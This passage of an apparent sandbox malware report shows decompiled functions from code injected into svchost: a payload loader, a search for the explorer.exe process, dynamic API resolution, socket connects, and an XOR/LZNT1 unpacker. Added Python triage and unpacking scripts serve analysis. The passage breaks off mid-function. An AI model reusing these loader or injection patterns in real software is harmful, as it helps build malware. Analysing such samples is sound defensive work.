				_v6 = 0x2d; // l_linger = 45 seconds (the "-" in the String ID below is this 0x2d byte, not a string)
				_push(4);        // optlen = sizeof(struct linger)
				_t5 =  &_v8;
				_push(_t5);      // optval
				_push(0x80);     // optname 0x0080 = SO_LINGER
				_push(0xffff);   // level 0xffff = SOL_SOCKET
				_push(_a4);      // the socket
				L1000B902(); // executed: setsockopt(s, SOL_SOCKET, SO_LINGER, &linger, 4), see APIs
				// Effect: closesocket on a blocking socket waits up to 45 s for queued data to be sent before the handle goes away.
				return _t5;
			}

Instruction addresses of the decompiled lines: 0x10003d20 0x10003d26 0x10003d2c 0x10003d2e 0x10003d31 0x10003d32 0x10003d37 0x10003d3c 0x10003d3f 0x10003d45

APIs
• setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 10003D3F
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: setsockopt
• String ID: -
• API String ID: 3981526788-2547889144
• Opcode ID: c00deffa8279f414deeb298b0719be20528acea0531aeb82b9b4c04b10122719
• Instruction ID: 0d75a650b1316d621f053bafd32783ef1c68aeefaa6748fc0268d4c78e028514
• Opcode Fuzzy Hash: c00deffa8279f414deeb298b0719be20528acea0531aeb82b9b4c04b10122719
• Instruction Fuzzy Hash: B4D0C76055020DB5D710DB44CC07F9D72789F01758F108271BB50AA2E1E7F56B58939D
Uniqueness

Uniqueness Score: 0.92%

C-Code - Quality: 64%
			E024439B0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				char _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				struct _SECURITY_ATTRIBUTES* _t25;

				if(E02442D80(__ecx, _a4) != 0) {
					_v12 = 0;
					// E024433F0 fills _v8 (an image or handle) and _v16 (a code pointer); a return of 1 signals success.
					_t25 = E024433F0(_a4, _a8,  &_v8,  &_v16); // executed
					_v12 = _t25;
					if(_v12 != 1) {
						return 0;
					}
					E02443800(_v8); // executed
					if(_a12 != 1) {
						if(_a16 != 1) {
							_v28 = _v16;
							_v28(); // call the code pointer with no arguments
						} else {
							_v24 = _v16;
							_v24(_v8, 1, 0); // the (base, 1, 0) argument shape is that of DllMain(hinst, DLL_PROCESS_ATTACH, NULL); inference from the decompile, not stated by the report
						}
					} else {
                                                                                                                                        						_v20 = CreateThread(0, 0, E02443B00, _v8, 0, 0);
                                                                                                                                        						CloseHandle(_v20);
                                                                                                                                        					}
                                                                                                                                        					return 1;
                                                                                                                                        				}
                                                                                                                                        				return 0;
                                                                                                                                        			}











APIs
• CreateThread.KERNEL32 ref: 02443A18
• CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,024419B9), ref: 02443A25
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: CloseCreateHandleThread
• String ID:
• API String ID: 3032276028-0
• Opcode ID: f628649530502677825ae195bfca3bd8e8250cabc5ff1c43e60a6264aa3cc52c
• Instruction ID: d97087717fa851af0eaea248ff52e60ca5f72253099e13b8d737d315811135c3
• Opcode Fuzzy Hash: f628649530502677825ae195bfca3bd8e8250cabc5ff1c43e60a6264aa3cc52c
• Instruction Fuzzy Hash: 9B1145B5E40208FFEB14DF94C945BAE7B78AB04B04F20449AE915B6240DB71AA50CB91
Uniqueness
Uniqueness Score: 0.08%

C-Code - Quality: 83%
E02443100(CHAR* _a4) {
    signed int _v8;
    unsigned int _v12;
    unsigned int _v16;
    char _v276;
    char _v4372;
    signed int _t23;
    void* _t26;
    int _t29;
    void* _t40;
    void* _t41;

    E02441420(0x1110);
    _t23 = &_v16;
    _push(_t23);
    _push(0x1000);
    _push(&_v4372); // executed
    L02443D34(); // executed
    if(_t23 != 0) {
        _v12 = _v16 >> 2;
        _v8 = 0;
        while(_v8 < _v12) {
            _t26 = E024431A0(*((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)), &_v276); // executed
            _t41 = _t41 + 8;
            if(_t26 == 0) {
                L8:
                _t23 = _v8 + 1;
                _v8 = _t23;
                continue;
            }
            _t29 = lstrcmpiA(&_v276, _a4); // executed
            if(_t29 != 0) {
                goto L8;
            }
            return *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110));
        }
        return _t23 | 0xffffffff;
    }
    return _t23 | 0xffffffff;
}

APIs
• EnumProcesses.PSAPI(?,00001000,?,?,02443080,explorer.exe), ref: 0244311D
• lstrcmpiA.KERNEL32(?,02443080,?,?,02443080), ref: 02443177
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: EnumProcesseslstrcmpi
• String ID:
• API String ID: 1246086236-0
• Opcode ID: 27c896115ec6ad8668823a2a95eafcf248d07c07af89c232772b2c0debd1fdce
• Instruction ID: 3030cb91403155f93b55ae05e5ea7a6ff9d83396f093f5155108ef713e408cf9
• Opcode Fuzzy Hash: 27c896115ec6ad8668823a2a95eafcf248d07c07af89c232772b2c0debd1fdce
• Instruction Fuzzy Hash: D3112571D00108EBEB19DF95D941AEDBBB9BF48794F2046DEE51597280EB34AE80CF50
Uniqueness
Uniqueness Score: 6.12%

C-Code - Quality: 88%
E10002491(CHAR* _a4, _Unknown_base(*)()** _a8) {
    struct HINSTANCE__* _t4;
    struct HINSTANCE__* _t5;
    _Unknown_base(*)()* _t8;
    _Unknown_base(*)()* _t9;
    struct HINSTANCE__* _t10;
    CHAR* _t12;
    _Unknown_base(*)()** _t13;

    _t4 = LoadLibraryA(_a4); // executed
    _t5 = _t4;
    if(_t5 != 0) {
        _t12 = _a4;
        _t10 = _t5;
        _t13 = _a8;
        while(1) {
            asm("cld");
            asm("repne scasb");
            if(*_t12 == 0) {
                break;
            }
            _t8 = GetProcAddress(_t10, _t12); // executed
            _t9 = _t8;
            if(_t9 != 0) {
                *_t13 = _t9;
                _t13 = _t13 + 4;
                continue;
            } else {
                return _t9;
            }
            goto L8;
        }
        return 1;
    } else {
        return _t5;
    }
    L8:
}

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1000249A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 100024C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                        • Opcode ID: 870185dbd015ea786528823a665d77c1e5f872cbc3fa789be7688ac631c3e2fb
                                                                                                                                        • Instruction ID: d3a6b0a3fd31fd340069383c012ec627f624441b07a0343c5925038ed23a94d8
                                                                                                                                        • Opcode Fuzzy Hash: 870185dbd015ea786528823a665d77c1e5f872cbc3fa789be7688ac631c3e2fb
                                                                                                                                        • Instruction Fuzzy Hash: DDF0E9773040051AE710DA39EC4198EAFC8D7E33F8B104132F906A7189E569DC85C3A0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                         			E10001EEF(CHAR* _a4) {
                                                                                                                                         				char* _t4;
                                                                                                                                         				void* _t6;
                                                                                                                                         				void* _t11;
                                                                                                                                         
                                                                                                                                         				_t4 = _a4;
                                                                                                                                         				if(_t4 == 0 ||  *_t4 == 0) {
                                                                                                                                         					return 0;
                                                                                                                                         				} else {
                                                                                                                                         					// 0x80 = FILE_READ_ATTRIBUTES, 3 = OPEN_EXISTING: no read or write access is requested, so this only probes whether the path exists
                                                                                                                                         					_t6 = CreateFileA(_a4, 0x80, 0, 0, 3, 0, 0); // executed
                                                                                                                                         					_t11 = _t6 + 1;
                                                                                                                                         					if(_t11 != 0) { // handle != INVALID_HANDLE_VALUE (-1)
                                                                                                                                         						CloseHandle(_t11 - 1); // executed; the handle is discarded immediately
                                                                                                                                         						return 1;
                                                                                                                                         					}
                                                                                                                                         					return 0;
                                                                                                                                         				}
                                                                                                                                         			}

                                                                                                                                         Address column of the disassembly panel (instruction text not extracted): 0x10001ef6 to 0x10001f35

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 10001F1B
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 10001F29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3498533004-0
                                                                                                                                        • Opcode ID: cdcc382cb588571cf2e4d2ce0265a9c1c0183c5f261a78be77ae25a8d83fa87d
                                                                                                                                        • Instruction ID: 35d315fe695ac5584e02851765a74a28a0ab811d8fee9b5a65efbe62112bd4f2
                                                                                                                                        • Opcode Fuzzy Hash: cdcc382cb588571cf2e4d2ce0265a9c1c0183c5f261a78be77ae25a8d83fa87d
                                                                                                                                        • Instruction Fuzzy Hash: 0DE04F727507893AF7329A68DC83F5525C8D7017D8F204531B755EE1CAE5E9ED414218
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                         			E100038E3(void* __eax, intOrPtr _a4) {
                                                                                                                                         				void* _t5;
                                                                                                                                         				intOrPtr* _t7;
                                                                                                                                         
                                                                                                                                         				_push(_a4);
                                                                                                                                         				L1000B8D2(); // import thunk; inet_addr, inferred from the INADDR_NONE check below and the API ID
                                                                                                                                         				if(__eax == 0xffffffff) { // INADDR_NONE: _a4 is not a dotted quad, treat it as a host name
                                                                                                                                         					_push(_a4);
                                                                                                                                         					L1000B8D8(); // executed; import thunk for gethostbyname
                                                                                                                                         					_t5 = __eax;
                                                                                                                                         					if(_t5 != 0) {
                                                                                                                                         						_t7 =  *((intOrPtr*)(_t5 + 0xc)); // hostent->h_addr_list (offset 0xc in the 32-bit struct)
                                                                                                                                         						if(_t7 != 0) {
                                                                                                                                         							return  *((intOrPtr*)( *_t7)); // first IPv4 address, network byte order
                                                                                                                                         						}
                                                                                                                                         						return 0xffffffff;
                                                                                                                                         					}
                                                                                                                                         					return 0xffffffff;
                                                                                                                                         				}
                                                                                                                                         				return __eax; // already a valid IPv4 address
                                                                                                                                         			}

                                                                                                                                         Address column of the disassembly panel (instruction text not extracted): 0x100038e6 to 0x1000391a

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: gethostbynameinet_addr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1594361348-0
                                                                                                                                        • Opcode ID: 8c400096880104600583be4b6b922c41cb276276376e47ed8660e36d45976d36
                                                                                                                                        • Instruction ID: 3d936b1e40c040e39a6e134a820fed943076fd0182b4c0a063608c00e74aed5d
                                                                                                                                        • Opcode Fuzzy Hash: 8c400096880104600583be4b6b922c41cb276276376e47ed8660e36d45976d36
                                                                                                                                        • Instruction Fuzzy Hash: BFE0B6352049069BA612CA29D84180A7B98EB062F8725C312F574DB2F9EBB0E9209781
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                         			E1000396D(intOrPtr __eax) {
                                                                                                                                         				void* _t4;
                                                                                                                                         				void* _t8;
                                                                                                                                         
                                                                                                                                         				 *((intOrPtr*)(_t8 - 0xc)) = __eax; // sin_addr of the 16-byte sockaddr_in built at _t8 - 0x10
                                                                                                                                         				_push(0x10); // sizeof(sockaddr_in)
                                                                                                                                         				_t4 = _t8 - 0x10;
                                                                                                                                         				_push(_t4);
                                                                                                                                         				_push(0); // executed; socket argument as recovered by the decompiler (quality 50%)
                                                                                                                                         				L1000B8E4(); // executed; import thunk for connect, ref 10003988
                                                                                                                                         				if(_t4 == 0xffffffff) { // return value of connect (decompiler reused _t4): SOCKET_ERROR
                                                                                                                                         					_push(0);
                                                                                                                                         					L1000B8EA(); // import thunk for closesocket, ref 10003993
                                                                                                                                         				}
                                                                                                                                         				return 0;
                                                                                                                                         			}

                                                                                                                                         Address column of the disassembly panel (instruction text not extracted): 0x1000397e to 0x1000399e

                                                                                                                                        APIs
                                                                                                                                        • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003988
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003993
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: closesocketconnect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1323028321-0
                                                                                                                                        • Opcode ID: 69cb5497a60836a45aace7dc6f59573714a35a3096fefe75253120fbf4fb7fd9
                                                                                                                                        • Instruction ID: 065c32b9e06246834b904166c4d3de4238c759a38f7dea1ba7916fe768c60376
                                                                                                                                        • Opcode Fuzzy Hash: 69cb5497a60836a45aace7dc6f59573714a35a3096fefe75253120fbf4fb7fd9
                                                                                                                                        • Instruction Fuzzy Hash: 67D0C971A0060469F711CBB95CC1AAFA39CEB102A8B109A2BF636D11D9D5B4D404A620
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.11%
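As an added triage example (not part of the Joe Sandbox report or its IDA plugin output), the Python below parses the "APIs" lines and the "Memory Dump Source" names in the format shown above and flags what a responder would look for in these function blocks: dynamic import resolution (LoadLibraryA/GetProcAddress), the FILE_READ_ATTRIBUTES/OPEN_EXISTING existence probe in E10001EEF, an outbound connect, and a PE-backed PAGE_EXECUTE_READWRITE region dumped out of svchost. The API lines are copied from this report; the field layout assumed for the .sdmp name (process index, stage, timestamp, base, protection, type), the tactic groupings and the system-process list are the editor's assumptions, not Joe Sandbox signature definitions.

```python
"""Triage of Joe Sandbox function blocks by their Win32 API calls and dump origin.

Added example, not part of the Joe Sandbox report or its IDA plugin. The
"APIs" lines below are copied from this report; the .sdmp name field layout,
the tactic groupings and the system-process list are the editor's assumptions.
"""
import re
from dataclasses import dataclass

# API lines exactly as they appear in the report's "APIs" sections on this page.
REPORT_APIS = """
• LoadLibraryA.KERNEL32(?), ref: 1000249A
• GetProcAddress.KERNEL32(00000000,?), ref: 100024C8
• CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 10001F1B
• CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 10001F29
• connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003988
• closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003993
"""
# Dump source and snapshot names as printed in the "Memory Dump Source" block.
DUMP_NAME = "00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp"
SNAPSHOT = "hcaresult_6_2_10000000_svchost.jbxd"

API_LINE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 constants behind the raw numbers in the CreateFileA call of E10001EEF.
FILE_READ_ATTRIBUTES = 0x80
OPEN_EXISTING = 3
PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # raw argument strings; "?" where the sandbox could not recover a value
    ref: int     # address of the call site


def parse_api_lines(text):
    """Parse '• Api.MODULE(args), ref: ADDR' lines into ApiCall records."""
    calls = []
    for m in API_LINE.finditer(text):
        args = [a for a in m.group("args").split(",") if a]
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def _hexarg(s):
    try:
        return int(s, 16)
    except ValueError:
        return None  # "?" or another unrecovered argument


def is_existence_probe(call):
    """CreateFileA(path, FILE_READ_ATTRIBUTES, ..., OPEN_EXISTING, ...) requests no
    data access: the handle only answers whether the path exists, which is what
    E10001EEF does before closing it again."""
    if call.api != "CreateFileA" or len(call.args) < 5:
        return False
    return (_hexarg(call.args[1]) == FILE_READ_ATTRIBUTES
            and _hexarg(call.args[4]) == OPEN_EXISTING)


# Groupings are the editor's assumption, not Joe Sandbox signature names.
PATTERNS = {
    "dynamic-import-resolution": {"LoadLibraryA", "GetProcAddress"},
    "file-probe": {"CreateFileA", "CloseHandle"},
    "outbound-connect": {"connect"},
}


def classify(calls):
    """Return the tactic tags whose full API set appears among the calls."""
    names = {c.api for c in calls}
    tags = sorted(tag for tag, needed in PATTERNS.items() if needed <= names)
    if any(is_existence_probe(c) for c in calls):
        tags.append("file-existence-check")
    return tags


def parse_dump_name(name):
    """Assumed layout: <proc>.<stage>.<timestamp>.<base>.<protect>.<type>.sdmp"""
    f = name.split(".")
    return {"process": int(f[0]), "base": int(f[3], 16), "protect": int(f[4], 16)}


# Hosts in which a PE-backed RWX region is never expected (editor's list).
SYSTEM_HOSTS = {"svchost", "explorer", "rundll32"}


def region_flags(dump_name, snapshot):
    """Flag an RWX, PE-backed dump taken out of a system process: the usual
    footprint of an injected, manually mapped module."""
    info = parse_dump_name(dump_name)
    host = snapshot.split(".")[0].rsplit("_", 1)[-1]
    flags = []
    if info["protect"] == PAGE_EXECUTE_READWRITE:
        flags.append("rwx-region")
    if host in SYSTEM_HOSTS:
        flags.append("system-process:" + host)
    return flags


if __name__ == "__main__":
    print(classify(parse_api_lines(REPORT_APIS)))
    print(region_flags(DUMP_NAME, SNAPSHOT))
```

Run stand-alone it prints the tactic tags for the six calls and the region flags for the svchost dump; in practice the same parser would be pointed at every "APIs" block of the report so that functions combining import resolution, file probing and sockets rank above the thousands of library stubs that share a 0.01% uniqueness score.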

                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                        			E02442500(void* __eflags) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				long _v12;
                                                                                                                                        				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				void* _t54;
				void* _t57;

				// Three heap buffers: two of 0x80000 bytes (512 KiB) and one of 0x1000 bytes (4 KiB).
				// E02441390 wraps GetProcessHeap + RtlAllocateHeap (see the APIs list below).
				_v12 = 0x80000;
				_t34 = E02441390(_v12); // executed
				_v20 = _t34;
				_v40 = _v20 + 4;                                  // view of the first buffer that skips its first 4 bytes
				_v28 = E02441390(_v12);
				_t36 = E02441390(0x1000);
				_t57 = _t54 + 0xc;
				_v8 = _t36;
				_v36 = 1;
				// No statement in this function changes _v36 after it is set to 1: as decompiled the
				// loop is endless and the trailing return is never reached.
				while(_v36 == 1) {
					_v24 = 0;
					// E02441580 calls GetVersion and wsprintfA (see APIs); a return value of 1 is treated as success.
					_t36 = E02441580(_v12, _v20, _v20, _v12,  &_v44); // executed
					_t57 = _t57 + 0xc;
					_v24 = _t36;
					if(_v24 != 1) {
						L12:
						// Failure path: wait one minute (0xea60 = 60000 ms), call E024426B0, wait another minute, retry.
						if(_v36 == 1) {
							Sleep(0xea60); // executed
							_t36 = E024426B0();
							Sleep(0xea60); // executed
						}
						continue;
					}
					// Success path: process the data past the 4-byte prefix into the second buffer,
					// then consume it through the 4 KiB buffer in the inner loop.
					_t39 = E024424A0(_v40, _v28);
					_t57 = _t57 + 8;
					_v44 = _t39;
					_v16 = _v28;
					while(1) {
						_t36 = 1;
						if(1 == 0) {                              // constant-folded condition left by the decompiler: dead branch
							goto L12;
						}
						_v16 = E024428A0(_v8, _v16, _v8);
						_t36 = E02442130(_v8, _v8);
						_t57 = _t57 + 0xc;
						if(1 == 1) {                              // constant-folded condition: always taken
							_v32 = 0;
							_t36 = E02442720(_v8,  &_v32); // executed
							_t57 = _t57 + 8;
							if(1 == 1 && _v32 == 0) {
								_t36 = E02442630( &_v32, _v8);
								_t57 = _t57 + 4;
							}
						}
						if(_v16 != 0) {                           // E024428A0 returns 0 once the buffer is exhausted
							continue;
						} else {
							goto L12;
						}
					}
					goto L12;
				}
				return _t36;
			}

APIs
  • Part of subcall function 02441390: GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
  • Part of subcall function 02441390: RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
  • Part of subcall function 02441580: GetVersion.KERNEL32 ref: 024415AF
  • Part of subcall function 02441580: wsprintfA.USER32 ref: 02441652
• Sleep.KERNEL32(0000EA60), ref: 02442602
• Sleep.KERNEL32(0000EA60), ref: 02442612
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: HeapSleep$AllocateProcessVersionwsprintf
• String ID:
• API String ID: 1739176888-0
• Opcode ID: fe8af558304419022be10ff670e66ed83e135e8d78cd516acfe8f9a703f40dea
• Instruction ID: 336eb5adbfded6a6cfe056cd8633f112f8d3d74dfad5d1ab992b1aea7d85558f
• Opcode Fuzzy Hash: fe8af558304419022be10ff670e66ed83e135e8d78cd516acfe8f9a703f40dea
• Instruction Fuzzy Hash: 303143B5D001089BFF14DFD5D955BEEB7B9BB08304F10446AE909B6240EBB5AA44CF62
Uniqueness

Uniqueness Score: 0.00%

C-Code - Quality: 100%
			// _a4: packed blob (modified in place), _a8: its length, _a12: size of the scratch/output buffer.
			E024418A0(void* __eflags, intOrPtr _a4, intOrPtr _a8, long _a12) {
				signed int _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _t33;
				void* _t66;
				void* _t67;

				_t33 = E02441390(_a12);                           // heap allocation (GetProcessHeap + RtlAllocateHeap, see APIs)
				_t67 = _t66 + 4;
				_v12 = _t33;
				_v8 = 8;
				// Descramble: every byte from offset 8 on is XORed with the byte at (index % 8),
				// i.e. the first 8 bytes of the blob are a repeating XOR key and are left untouched.
				while(_v8 < _a8) {
					 *(_a4 + _v8) =  *(_a4 + _v8) ^  *(_a4 + _v8 % 8);
					_v8 = _v8 + 1;
				}
				// 2 == COMPRESSION_FORMAT_LZNT1. The payload after the 8-byte key is inflated into the
				// scratch buffer; _v20 receives the inflated size. Return value 0 is STATUS_SUCCESS.
				_v16 = RtlDecompressBuffer(2, _v12, _a12, _a4 + 8, _a8 - 8,  &_v20);
				if(_v16 == 0) {
					// (destination, source, size) argument order: presumably copies the _v20 inflated
					// bytes back over the caller's buffer; the body of E02441450 is not on this page.
					E02441450(_a4, _v12, _v20);
					_t67 = _t67 + 0xc;
				}
				E024413D0(_v12); // executed                      // releases the scratch buffer (counterpart of E02441390)
				if(_v16 != 0) {
					return 0;                                     // decompression failed
				}
				return _v20;                                      // inflated size on success
			}
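The descramble-and-inflate routine E024418A0 above, re-implemented in Python as an added example. This is not code from the report or from the sample: RtlDecompressBuffer is Windows-only, so a small LZNT1 decoder written for this example (following the MS-XCA chunk and token layout) stands in for the call with format 2, COMPRESSION_FORMAT_LZNT1. The key and the compressed stream at the bottom are constructed for the example; `pack_blob` only exists to build that input.

```python
"""Added example (not from the report or the sample): E024418A0 in Python.

The decompiled routine XORs every byte from offset 8 on with the blob's
first 8 bytes (a repeating 8-byte key), hands the result past the key to
RtlDecompressBuffer with format 2 (COMPRESSION_FORMAT_LZNT1), and returns
0 on failure or the inflated size on success. The LZNT1 decoder below is
written for this example and replaces the Windows-only API call.
"""
import struct


def lznt1_decompress(data: bytes) -> bytes:
    """Decode an LZNT1 stream; raises ValueError on a malformed stream."""
    out = bytearray()
    pos = 0
    while pos + 1 < len(data):
        header = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if header == 0:                      # zero header ends the stream
            break
        chunk_end = pos + (header & 0x0FFF) + 1
        if chunk_end > len(data):
            raise ValueError("truncated LZNT1 chunk")
        if not header & 0x8000:              # chunk stored as plain bytes
            out += data[pos:chunk_end]
            pos = chunk_end
            continue
        chunk_base = len(out)
        while pos < chunk_end:
            flags = data[pos]
            pos += 1
            for bit in range(8):             # one flag bit per token
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(data[pos])    # literal byte
                    pos += 1
                    continue
                if pos + 1 >= chunk_end:
                    raise ValueError("truncated LZNT1 token")
                token = struct.unpack_from("<H", data, pos)[0]
                pos += 2
                # The offset/length bit split grows with the bytes already
                # produced in this chunk: 4 offset bits for the first 16
                # bytes, 5 up to 32, and so on (MS-XCA, LZNT1 section).
                produced = len(out) - chunk_base
                shift, n = 0, produced - 1
                while n >= 0x10:
                    n >>= 1
                    shift += 1
                offset = (token >> (12 - shift)) + 1
                length = (token & (0x0FFF >> shift)) + 3
                if offset > produced:
                    raise ValueError("LZNT1 back-reference before chunk start")
                for _ in range(length):      # byte-wise: source may overlap
                    out.append(out[-offset])
    return bytes(out)


def unpack_blob(blob: bytes) -> bytes:
    """Mirror E024418A0: 8-byte repeating XOR key, then LZNT1 inflate.

    Returns b"" where the original returns 0 (decompression failure, or a
    blob too short to hold anything beyond the key).
    """
    if len(blob) <= 8:
        return b""
    key = blob[:8]
    body = bytes(c ^ key[i % 8] for i, c in enumerate(blob[8:]))
    try:
        return lznt1_decompress(body)
    except ValueError:
        return b""


def pack_blob(key: bytes, compressed: bytes) -> bytes:
    """Inverse of the XOR step; only used to build constructed test input."""
    assert len(key) == 8
    return key + bytes(c ^ key[i % 8] for i, c in enumerate(compressed))


# Constructed LZNT1 stream: one compressed chunk (header 0xB005 = 6 payload
# bytes), flag byte 0x08 = three literals "ABC" then one back-reference
# token 0x2006 = offset 3, length 9, which expands to "ABCABCABCABC".
SAMPLE_COMPRESSED = b"\x05\xb0\x08ABC\x06\x20"
SAMPLE_KEY = b"\x11\x22\x33\x44\x55\x66\x77\x88"      # constructed key
SAMPLE_BLOB = pack_blob(SAMPLE_KEY, SAMPLE_COMPRESSED)

if __name__ == "__main__":
    print(unpack_blob(SAMPLE_BLOB))
```

Pointing `unpack_blob` at a blob carved from the memory dump (the region the sample hands to this routine) recovers the inflated payload without running the malware; a malformed or wrongly carved blob yields an empty result rather than an exception, matching the original's 0 return.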

APIs
  • Part of subcall function 02441390: GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
  • Part of subcall function 02441390: RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
• RtlDecompressBuffer.NTDLL(00000002,?,02441E40,?,004FFFF8,02441E40), ref: 02441913
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateBufferDecompressProcess
• String ID:
• API String ID: 2896260840-0
• Opcode ID: f62f883a216b71a3e1029302e0321fafd6729d4e216a2095fb46150405a2c5c8
• Instruction ID: df66b5cfab17f793fe6972fe727095444cae913657ee4e4c9788c1732432fe85
• Opcode Fuzzy Hash: f62f883a216b71a3e1029302e0321fafd6729d4e216a2095fb46150405a2c5c8
• Instruction Fuzzy Hash: 80216F70E04148EFEB04CF98D880EAEBBB5BF48304F04859DE91D97301DA34AA80CF50
Uniqueness

Uniqueness Score: 1.01%

C-Code - Quality: 81%
			E10003ABF(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v2052;                                      // 2052-byte stack buffer
				void* _t14;
				void* _t17;
				intOrPtr _t19;
				char* _t20;
				void* _t23;
				intOrPtr _t24;

				_t24 = 0;
				_t14 = E100039ED(_a4, 0x5a); // executed
				if(_t14 != 0) {
					while(1) {
						// E100039ED(_a4, 0x5a) is called again on every pass; a zero result ends the loop.
						_t17 = E100039ED(_a4, 0x5a); // executed
						if(_t17 == 0) {
							break;
						}
						// cmp _a12, 0x800 (2048). The listing on this page ends here, before the branch that uses the flags.
						__eflags = _a12 - 0x800;
                                                                                                                                        						if(_a12 <= 0x800) {
                                                                                                                                        							_t19 = _a12;
                                                                                                                                        						} else {
                                                                                                                                        							_t19 = 0x800;
                                                                                                                                        						}
                                                                                                                                        						_push(0);
                                                                                                                                        						_push(_t19);
                                                                                                                                        						_t20 =  &_v2052;
                                                                                                                                        						_push(_t20);
